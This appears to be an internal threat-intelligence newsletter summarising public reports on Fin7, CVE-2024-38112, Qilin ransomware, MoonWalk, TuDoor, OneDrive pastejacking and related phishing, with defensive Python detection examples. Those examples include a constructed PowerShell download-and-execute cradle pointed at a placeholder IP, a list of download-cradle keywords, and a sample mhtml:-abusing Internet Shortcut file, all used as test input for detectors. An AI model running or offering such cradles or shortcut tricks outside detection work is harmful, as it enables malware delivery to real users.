This is a monthly threat intelligence newsletter, with a lean towards phishing and healthcare, that I put together for the team at my company. Feel free to grab it and share it with your own internal team.
Threat Intelligence Newsletter: Resurgence of Russia's Fin7
Overview: The notorious cybercrime group Fin7, previously thought to be dismantled, has re-emerged with increased activity. This resurgence is primarily facilitated by Stark Industries Solutions, a hosting provider linked to Russian cyberattacks.
Key Developments:
Infrastructure: Fin7 now runs more than 4,000 hosts, spread across typosquatted look-alike domains, booby-trapped (malvertising) ads, and phishing domains.
Implications: Organizations must heighten vigilance against phishing, keep security controls and playbooks current, and monitor for newly registered look-alike domains that imitate their own brand.
For more details, visit Krebs on Security.
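The Fin7 item above recommends watching for look-alike domains; the snippet below is an added example of how to do that, not code from Krebs on Security or from the researchers cited there. It generates the common typosquat mutations (omission, transposition, repetition, homoglyph swap, hyphenation, alternate TLD) for a brand domain, then matches them and brand-embedding names (example-login.top) against a constructed feed of newly observed domains. The TLD list and every domain name are assumptions for the demo.

```python
"""Generate common typosquat and look-alike variants of a brand domain and
match them against a feed of newly observed domains.  Added example for the
Fin7 item above, not code from Krebs on Security or Silent Push; every domain
below is constructed for illustration."""

HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5"}
TLDS = ["com", "net", "org", "co", "top", "xyz"]  # TLDs worth watching (assumption)


def typosquat_variants(domain: str) -> set[str]:
    """Return look-alike registrable domains for a brand such as example.com."""
    name, _, tld = domain.lower().rpartition(".")
    names = set()
    for i in range(len(name)):                       # omission: exmple
        names.add(name[:i] + name[i + 1:])
    for i in range(len(name) - 1):                   # transposition: exmaple
        names.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    for i in range(len(name)):                       # repetition: exaample
        names.add(name[:i] + name[i] + name[i:])
    for i, ch in enumerate(name):                    # homoglyph: examp1e
        if ch in HOMOGLYPHS:
            names.add(name[:i] + HOMOGLYPHS[ch] + name[i + 1:])
    for i in range(1, len(name)):                    # hyphenation: ex-ample
        names.add(name[:i] + "-" + name[i:])
    names.discard(name)
    variants = {f"{n}.{t}" for n in names for t in TLDS}
    variants |= {f"{name}.{t}" for t in TLDS if t != tld}  # same name, other TLD
    return variants


def registrable(fqdn: str) -> str:
    """Crude eTLD+1: keeps the last two labels (assumes single-label TLDs)."""
    labels = fqdn.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def find_lookalikes(domain: str, observed: list[str]) -> list[str]:
    """Flag observed domains that are variants of, or embed, the brand name."""
    domain = domain.lower()
    name = domain.rpartition(".")[0]
    variants = typosquat_variants(domain)
    hits = []
    for fqdn in observed:
        reg = registrable(fqdn)
        if reg == domain:
            continue                                 # the brand's own hosts
        if reg in variants or name in reg:           # e.g. example-login.top
            hits.append(fqdn.lower())
    return hits


# Constructed "newly observed domains" feed for the demo
OBSERVED = [
    "examp1e.com", "exmaple.net", "mail.example.com", "example-login.top",
    "unrelated.org", "exampel.com", "shop.exaample.co",
]

if __name__ == "__main__":
    for hit in find_lookalikes("example.com", OBSERVED):
        print("look-alike:", hit)
```

In practice the observed list comes from a certificate-transparency or newly-registered-domain feed; the registrable() helper is deliberately crude and would need a public-suffix list for multi-label TLDs such as co.uk.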
New Internet Explorer Zero-Day Spoofing Attack (CVE-2024-38112)
Overview: Check Point Research (CPR) has identified a zero-day spoofing vulnerability, CVE-2024-38112, in the Windows MSHTML platform that attackers had been abusing for over a year. Malicious Internet Shortcut (.url) files used the mhtml: protocol handler to force a link to open in the retired Internet Explorer rather than Edge, and a further trick disguised an executable HTA file as a PDF, so victims who believed they were opening a document were running attacker code. Microsoft fixed the flaw in its July 2024 Patch Tuesday release; because the fix is an OS update, it applies even on systems where Internet Explorer is nominally disabled.
Key Details:
Recommendations:
For further information, visit the Check Point Blog.
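As an added example for the CVE-2024-38112 item above (not code from Check Point), the snippet below parses a Windows Internet Shortcut (.url) file and flags the two markers of the technique, a URL= value that starts with mhtml: and an embedded !x-usc: redirect, plus a generic check for an IconFile that points at a remote path. The .url contents are constructed to show the shape of the abuse; the hostnames and icon path are assumptions.

```python
"""Flag Internet Shortcut (.url) files that abuse the mhtml: handler to force
a link into Internet Explorer.  Added example; the .url contents below are
constructed to show the shape of the technique and are not samples from the
Check Point report."""
import configparser
import re

MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)   # mhtml:<url> forces MSHTML/IE
XUSC_RE = re.compile(r"!x-usc:", re.IGNORECASE)        # !x-usc:<url> nested redirect
REMOTE_ICON_RE = re.compile(r"^\s*(\\\\|https?://)", re.IGNORECASE)


def parse_url_file(text: str) -> dict[str, str]:
    """Return the [InternetShortcut] section of a .url file as a dict."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str            # keep key case (URL, IconFile, ...)
    cp.read_string(text)
    if "InternetShortcut" not in cp:
        return {}
    return dict(cp["InternetShortcut"])


def assess_url_file(text: str) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    fields = parse_url_file(text)
    url = fields.get("URL", "")
    icon = fields.get("IconFile", "")
    findings = []
    if MHTML_RE.match(url):
        findings.append("URL uses mhtml: handler (opens in Internet Explorer, not Edge)")
    if XUSC_RE.search(url):
        findings.append("URL embeds !x-usc: redirect inside mhtml: wrapper")
    if REMOTE_ICON_RE.match(icon):
        findings.append("IconFile points at a remote path (UNC/HTTP); possible credential leak")
    return findings


# Constructed samples (hostnames use the reserved .invalid TLD)
SUSPICIOUS = r"""[InternetShortcut]
URL=mhtml:http://cdn.report.invalid/Q2-report.pdf!x-usc:http://cdn.report.invalid/Q2-report.pdf
IconFile=C:\Program Files (x86)\Adobe\Acrobat Reader\Reader\AcroRd32.exe
IconIndex=13
"""

BENIGN = r"""[InternetShortcut]
URL=https://intranet.example.com/policies/
"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, "->", assess_url_file(sample) or ["clean"])
```

A mail gateway or EDR rule can apply the same two regexes to attachments and to files written by Outlook or a browser; a legitimate .url file has no reason to carry an mhtml: prefix.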
Ransomware Attack Disrupts U.K. Health Service Laboratory
Overview: A ransomware attack on Synnovis, a pathology laboratory partner for several major London hospitals, has significantly disrupted health services, including cancelled operations and blood transfusions. The Qilin ransomware group, which operates a Ransomware-as-a-Service model and also targets U.S.-based organizations, is behind the attack. After the ransom went unpaid, Qilin published more than 400 GB of private patient and healthcare data online.
Key Points:
Recommendations:
For more information, visit the KnowBe4 Blog.
Microsoft Links Scattered Spider Hackers to Qilin Ransomware Attacks
Microsoft has linked the Scattered Spider cybercrime group (tracked by Microsoft as Octo Tempest) to recent Qilin ransomware deployments. This financially motivated group has been active since 2022 and has targeted more than 130 high-profile organizations using phishing, MFA bombing (push-notification fatigue), and SIM swapping to take over accounts. Qilin, whose Linux encryptor targets VMware ESXi hosts, runs double-extortion attacks: data is stolen before encryption and leaked if the ransom is not paid.
Key Takeaways:
For more details, read the full article from Bleeping Computer.
Social Media Job Scams: Don't Be the Target!
Hunting for your dream job online? Unfortunately, social media can be a breeding ground for scammers who target unsuspecting job seekers. But fear not! Here are some key takeaways to help you avoid falling victim to their schemes:
Be wary of unsolicited offers, especially those that arrive through social media. Legitimate recruiters usually reach out about a role you applied for or through a referral from someone you know. If you receive a message out of the blue about a fantastic opportunity, proceed with caution.
Watch out for unprofessional communication. Typos, grammatical errors, and requests for money upfront are all major red flags. Legitimate companies will communicate professionally and will never ask you to pay for a job interview or training.
Suspicious of remote jobs with high salaries? You should be! Scammers often lure people in with the promise of a high-paying work-from-home position. If something sounds too good to be true, it probably is. But that doesn't mean there aren't real remote work opportunities out there. Do your research to ensure the company is legitimate before getting your hopes up.
Don't be afraid to investigate! Before you apply for any job, take some time to research the company. Look for online reviews, check their website for legitimacy, and see if they have a social media presence with a good following. A little detective work can go a long way in weeding out imposters.
Keep your personal information private. This includes your Social Security number, bank account number, and credit card number. Never share this information with someone you don't know and trust, especially through social media or email.
Be cautious about clicking on links or attachments. Phishing emails and messages are a common tactic used by scammers. If you receive a message from an unknown sender about a job opportunity, don't click on any links or attachments. Instead, go directly to the company's website to see if the job is listed there.
By following these tips, you can protect yourself from social media job scams and increase your chances of finding a legitimate and rewarding job opportunity. Remember, if it seems too good to be true, it probably is. So, be cautious, be smart, and happy hunting! For more details check out the KnowBe4 blog.
Phishing Alert: Microsoft Top Target, Social Media on the Rise
According to a recent Check Point Research report, Microsoft was the most imitated brand for phishing attacks in Q2 2024, accounting for over half of all attempts. This highlights the ongoing threat of brand phishing, where cybercriminals impersonate well-known companies to trick users into revealing personal information or clicking on malicious links.
The report also reveals new entries to the top 10 most impersonated brands, including Adidas, WhatsApp, and Instagram. This trend indicates a shift in cybercriminals' tactics, as they target social media and technology companies that hold valuable user data.
Top 10 Most Impersonated Brands in Q2 2024
Microsoft (57%)
Apple (10%)
LinkedIn (7%)
Google (6%)
Facebook (1.8%)
Amazon (1.6%)
DHL (0.9%)
Adidas (0.8%)
WhatsApp (0.8%)
Instagram (0.7%)
Check out Check Point’s blog for more details.
New Backdoor Used by APT41: MoonWalk
A recent blog post by Zscaler details a new backdoor called MoonWalk, used by the APT41 threat group for espionage and delivered by a loader Zscaler calls DodgeBox. The post covers MoonWalk's technical design, including its use of Google Drive as a command-and-control channel (so its traffic blends in with legitimate cloud usage) and its use of Windows Fibers to evade EDR hooks. MoonWalk is also modular, allowing the operators to swap in capabilities for different targets.
Here are some key takeaways from a threat intelligence perspective:
Organizations should be aware of the MoonWalk backdoor and take steps to protect themselves, such as:
By following these steps, organizations can help to mitigate the risk of being targeted by APT41 and other threat groups.
You can read more about MoonWalk here.
Phish-Friendly Domain Registry ".top" Put on Notice
The ".top" domain registry, managed by Jiangsu Bangning Science & Technology Co. Ltd., has been warned by ICANN for its failure to address phishing abuse. Findings revealed that over 4% of new ".top" domains from May 2023 to April 2024 were used for phishing. ICANN's notice demands immediate improvements, or the registry risks losing its license. This highlights the critical need for vigilant monitoring and prompt action against domain abuse to protect users from phishing threats.
For more information, read the full article on Krebs on Security.
Over 3,000 GitHub Accounts Used in Malware Distribution Scheme
Summary: A new threat, dubbed the 'Stargazers Ghost Network,' involves over 3,000 GitHub accounts used to distribute information-stealing malware via fake repositories. Discovered by Check Point Research, this Distribution-as-a-Service (DaaS) operation leverages GitHub's reputation to spread infostealers such as RedLine and Lumma Stealer. Despite GitHub's takedowns, over 200 malicious repositories remained active at the time of the report.
Key Takeaway:
Operation: Accounts are split into roles (some host the phishing repository template, some the images, some the malware download link, and others star and fork the repositories to make them look legitimate), so the network keeps working even after partial takedowns.
For more information, read the full article on BleepingComputer.
North Korean Operative Infiltrates KnowBe4 Using Stolen Identity
Summary: KnowBe4 recently revealed that a North Korean operative, posing as a U.S. citizen with a stolen identity, successfully got hired as a software engineer. The individual passed multiple rounds of video interviews and a background check, but was detected when the newly shipped workstation began loading malware shortly after it was activated. No illegal access was gained and no data was lost, because the endpoint was monitored and isolated before the malware could act.
Key Takeaways:
Recommendations: Regularly review and update hiring and onboarding procedures to mitigate risks from sophisticated threat actors.
For more information, read the full article on KnowBe4 Blog.
Exploiting CrowdStrike Outage: Phishing, Fake Scripts, and Social Engineering
Summary: Following the July 19 CrowdStrike Falcon sensor content update that caused widespread blue screen of death (BSOD) crashes on Windows hosts, cybercriminals are capitalizing on the confusion. Fake "fix" PowerShell scripts, look-alike CrowdStrike domains, and social engineering calls posing as support staff are proliferating, posing significant risks to organizations still recovering.
Key Takeaways:
Recommendations: Take remediation guidance only from CrowdStrike's official channels, verify the authenticity of any script or domain before use, and remind users that neither CrowdStrike nor Microsoft will cold-call them with a fix.
For more information, read the full article on ReliaQuest Blog.
Huntress Foils a Medical Software Update Hack
Huntress recently uncovered a phishing campaign that abused a medical software update as its lure. Cybercriminals built a fake version of a legitimate medical image viewer, embedding code that opened a covert command-and-control connection back to the attackers. The case shows that an update from a "trusted" source still needs the same scrutiny as any other download. Huntress's Security Operations Center (SOC) detected the anomalous connection and quickly isolated the host, preventing a potential data breach.
Key Takeaways:
For more details, visit Huntress's blog.
TuDoor: Exploiting DNS Logic Vulnerabilities
A new DNS attack method, named TuDoor, has been identified, highlighting logic vulnerabilities in how DNS software pre-processes responses. By sending deliberately malformed DNS response packets, attackers can trigger cache poisoning, denial-of-service, and resource-exhaustion conditions in resolvers. TuDoor affects 24 mainstream DNS implementations and many public DNS services, potentially affecting millions of users.
Key Takeaways:
Be aware of the TuDoor attack method.
Ensure DNS software is up-to-date with patches.
Monitor for unusual DNS traffic patterns.
For more details, visit TuDoor's website.
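The TuDoor item above concerns what a resolver does with a response before trusting it. The block below is an added example, not the TuDoor authors' code, that builds tiny DNS query and response packets in wire format and then applies the pre-processing checks a resolver must pass before a reply may touch the cache: matching transaction ID, QR bit and opcode, an echoed question section, and section counts that actually fit inside the packet. Every non-ok outcome means "discard this packet and keep waiting", never "abort the query", which is the class of inconsistent early-termination behaviour TuDoor probes for. All packets are constructed inline.

```python
"""Minimal DNS wire-format helpers plus the response pre-processing checks a
resolver must pass before a reply may touch the cache.  Added example to
illustrate the class of logic TuDoor probes; it is not the TuDoor authors'
code, and every packet is constructed inline."""
import struct

HEADER = struct.Struct("!HHHHHH")   # ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf: bytes, off: int) -> tuple[str, int]:
    """Return (name, offset after name).  Compression pointers are rejected
    here to keep the example short; a real parser must bound-check them too."""
    labels = []
    while True:
        if off >= len(buf):
            raise ValueError("name runs past end of packet")
        n = buf[off]
        off += 1
        if n & 0xC0:
            raise ValueError("compression pointer not supported here")
        if n == 0:
            return ".".join(labels), off
        if off + n > len(buf):
            raise ValueError("label runs past end of packet")
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def build_query(txid: int, qname: str, qtype: int = 1) -> bytes:
    return HEADER.pack(txid, 0x0100, 1, 0, 0, 0) + encode_name(qname) + struct.pack("!HH", qtype, 1)


def build_response(txid: int, qname: str, ip: str, ancount: int = 1) -> bytes:
    """Answer with one A record; ancount may be lied about to simulate a malformed reply."""
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    rr = encode_name(qname) + struct.pack("!HHIH", 1, 1, 300, len(rdata)) + rdata
    return HEADER.pack(txid, 0x8180, 1, ancount, 0, 0) + question + rr


def validate_response(query: bytes, resp: bytes) -> str:
    """Return 'ok' or the reason the packet must be discarded.  Every non-ok
    path means: drop this packet and keep waiting for the real one; it must
    never abort the pending query or store anything."""
    if len(resp) < HEADER.size:
        return "short header"
    qid, qflags, *_ = HEADER.unpack(query[:HEADER.size])
    rid, rflags, qd, an, ns, ar = HEADER.unpack(resp[:HEADER.size])
    if rid != qid:
        return "txid mismatch"
    if not rflags & 0x8000:
        return "QR bit not set"
    if (rflags >> 11) & 0xF != (qflags >> 11) & 0xF:
        return "opcode mismatch"
    if qd != 1:
        return "unexpected QDCOUNT"
    try:
        qname, qoff = decode_name(query, HEADER.size)
        rname, roff = decode_name(resp, HEADER.size)
        if roff + 4 > len(resp):
            return "truncated question"
        if (rname.lower(), resp[roff:roff + 4]) != (qname.lower(), query[qoff:qoff + 4]):
            return "question section does not match query"
        roff += 4
        for _ in range(an + ns + ar):            # walk every declared RR
            _, roff = decode_name(resp, roff)
            if roff + 10 > len(resp):
                return "truncated resource record"
            rdlen = struct.unpack("!H", resp[roff + 8:roff + 10])[0]
            roff += 10 + rdlen
            if roff > len(resp):
                return "RDATA runs past end of packet"
    except ValueError as exc:
        return str(exc)
    if roff != len(resp):
        return "trailing bytes after declared records"
    return "ok"


if __name__ == "__main__":
    q = build_query(0x1234, "example.com")
    print(validate_response(q, build_response(0x1234, "example.com", "192.0.2.1")))
    print(validate_response(q, build_response(0x1234, "example.com", "192.0.2.1", ancount=2)))
```

Source-port matching and 0x20 case randomization belong in the same gate but sit at the socket layer, so they are left out here; the point of the example is that every malformed-packet branch returns the same way and leaves the pending query untouched.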
Generative AI Tools: New Target for Scammers
Recent intelligence highlights a surge in cyber threats exploiting interest in generative AI tools, particularly ChatGPT. Scammers are registering suspicious domains containing keywords like "gpt" and "prompt engineering," aiming to deceive users with phishing schemes and malware distribution. This trend coincides with major AI-related announcements, increasing the risk to individuals and organizations exploring these technologies.
Key Insights:
For more details, visit KnowBe4's Blog.
OneDrive Pastejacking: A New Phishing Tactic
Trellix has documented a phishing campaign that targets OneDrive users with a "pastejacking" lure. The email carries an HTML attachment that impersonates a OneDrive page and displays a fake error saying the cloud service could not be reached, along with a "How to fix" button. Clicking the button silently copies a Base64-encoded PowerShell command to the clipboard and walks the user through opening a PowerShell window and pasting it, so the victim runs the attacker's downloader with their own hands. No exploit is involved, and because the user types the final command, mail and browser controls never see an executable attachment.
Key Insights:
For more details, visit Trellix's Blog.
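Since the pastejacking chain above ends with the user launching PowerShell themselves, the telemetry to hunt in is process creation. The block below is an added example for that item, not Trellix's code: it decodes an -EncodedCommand payload from a Sysmon-style event, checks for a hidden window, an execution-policy bypass and a download cradle, and notes an explorer.exe parent, which is what a Run-dialog or Start-menu launch looks like. The events, the payload and the URL are constructed for the demo.

```python
"""Decode -EncodedCommand payloads from process-creation events and flag the
pastejacking pattern: PowerShell launched from the Run dialog or a shell the
user opened, with a hidden window and a download cradle.  Added example for
the OneDrive item above with constructed Sysmon-style events; it is not
Trellix's code."""
import base64
import re

ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]{8,})")
CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
           "invoke-expression", "iex ", "net.webclient", "start-bitstransfer")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if absent/undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def triage(event: dict) -> dict:
    """Score one process-creation event (CommandLine, ParentImage keys)."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    decoded = decode_encoded_command(cmd)
    low = cmd.lower()
    text = low + " " + (decoded.lower() if decoded else "")
    findings = []
    toks = low.split()
    for i, tok in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if tok in ("-w", "-windowstyle") and nxt.startswith("hidden"):
            findings.append("hidden window")
        if tok in ("-ep", "-executionpolicy") and nxt == "bypass":
            findings.append("execution policy bypass")
    if decoded:
        findings.append("encoded command decoded")
    findings += [f"download cradle: {c.strip()}" for c in CRADLES if c in text]
    # A Run-dialog (Win+R) or Start-menu launch shows up with explorer.exe as the parent
    if parent.endswith("explorer.exe"):
        findings.append("launched from explorer.exe (user-pasted?)")
    cradle = any(f.startswith("download cradle") for f in findings)
    verdict = "high" if cradle and (decoded or "hidden window" in findings) else "low"
    return {"decoded": decoded, "findings": findings, "verdict": verdict}


# Constructed payload and events (192.0.2.0/24 is a documentation range)
SAMPLE_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')".encode("utf-16-le")
).decode()
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -w hidden -ep bypass -enc {SAMPLE_PAYLOAD}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev)["verdict"], ev["CommandLine"][:60])
```

The same logic applies to Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled; the explorer.exe parent alone is noisy, so it is recorded as context rather than used in the verdict.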